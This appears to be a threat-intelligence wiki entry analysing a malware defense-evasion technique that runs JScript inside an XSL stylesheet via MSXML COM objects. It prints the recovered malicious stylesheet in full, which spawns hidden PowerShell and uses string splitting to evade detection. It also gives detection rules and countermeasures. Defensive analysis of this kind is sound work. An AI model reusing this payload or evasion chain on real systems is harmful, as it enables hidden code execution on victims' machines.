typetechniqueconfidencehighcreated2026-08-19updated2026-08-19jscriptxsltdefense-evasionexecutionactivex

XSLT JScript Extension Execution

A defense-evasion and execution technique in which a JScript/WScript carrier constructs an XSL stylesheet containing an msxsl:script block with language="JScript" and implements-prefix="u". The JScript function inside the CDATA block instantiates ActiveXObject("WScript.Shell") and calls .Run() to spawn a hidden PowerShell process. The XSLT is then loaded via MSXML2.XSLTemplate, applied to an empty MSXML2.DOMDocument, and executed through the JScript extension callback.

Pipeline

Stage 1 — XSL Stylesheet Construction

The carrier script builds the XSL stylesheet character-by-character using String.fromCharCode() to avoid string-literal detection:

<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:msxsl="urn:schemas-microsoft-com:xslt"
                xmlns:u="urn:5lCNtABZX3A">
  <msxsl:script language="JScript" implements-prefix="u">
    <![CDATA[
    function v1(){
      var _ax="Acti"+"veX"+"Object";
      var s=new this[_ax]("WScript.Shell");
      s.Run("conhost.exe --headless powershell.exe -W H -nOP -nONI -Command \"&([scriptblock]::Create($env:sVS8A4njYXDu))\"",0,false);
      return "";
    }
    ]]>
  </msxsl:script>
  <xsl:template match="/">
    <xsl:value-of select="u:v1()"/>
  </xsl:template>
</xsl:stylesheet>

^[/intel/analyses/eba13078dea9e803b9120a45cd0dfad589f1defdf0f86fe84ae77fe63fff5300.html]

Stage 2 — MSXML COM Chain

The carrier instantiates four COM objects in sequence:

  1. WScript.Shell — for environment variable staging and potential self-deletion.
  2. Msxml2.DOMDocument.6.0 — empty XML document to serve as transform input.
  3. Msxml2.FreeThreadedDOMDocument.6.0 — loads the XSL stylesheet; may call .setProperty() to disable external entity resolution or XSLT security features.
  4. Msxml2.XSLTemplate.6.0 — compiles the stylesheet and creates a processor.

The processor is then invoked with .transform(), which triggers the JScript callback. ^[/intel/analyses/eba13078dea9e803b9120a45cd0dfad589f1defdf0f86fe63fff5300.html]

Detection Opportunities

  • EDR: Flag wscript.exe or cscript.exe spawning conhost.exe --headless followed by powershell.exe with -W H -nOP -nONI.
  • Behavioral: Monitor Msxml2.XSLTemplate instantiation in processes whose parent is wscript.exe.
  • Sigma: Alert on WScript.Shell.Run where the command line contains conhost.exe --headless powershell.exe.
  • Memory forensics: Look for XSL stylesheet fragments in process memory containing msxsl:script and language="JScript".

Defensive Countermeasures

  • Disable the MSXML2.XSLTemplate COM object via AppLocker/CLSID restrictions if not needed for business applications.
  • Block conhost.exe --headless execution from non-terminal parent processes.
  • Enable AMSI for JScript execution (the msxsl:script block is scanned by AMSI on Windows 10+).

Pages Where Observed

  • unclassified-js-cjk-stego-dropper — entity page for the family using this technique
  • eba13078 — full analysis ^[/intel/analyses/eba13078dea9e803b9120a45cd0dfad589f1defdf0f86fe84ae77fe63fff5300.html]

References

  • MITRE ATT&CK T1059.007 — XSLT as a scripting language
  • MSXML XSLT Extensions: https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms760218(v=vs.85)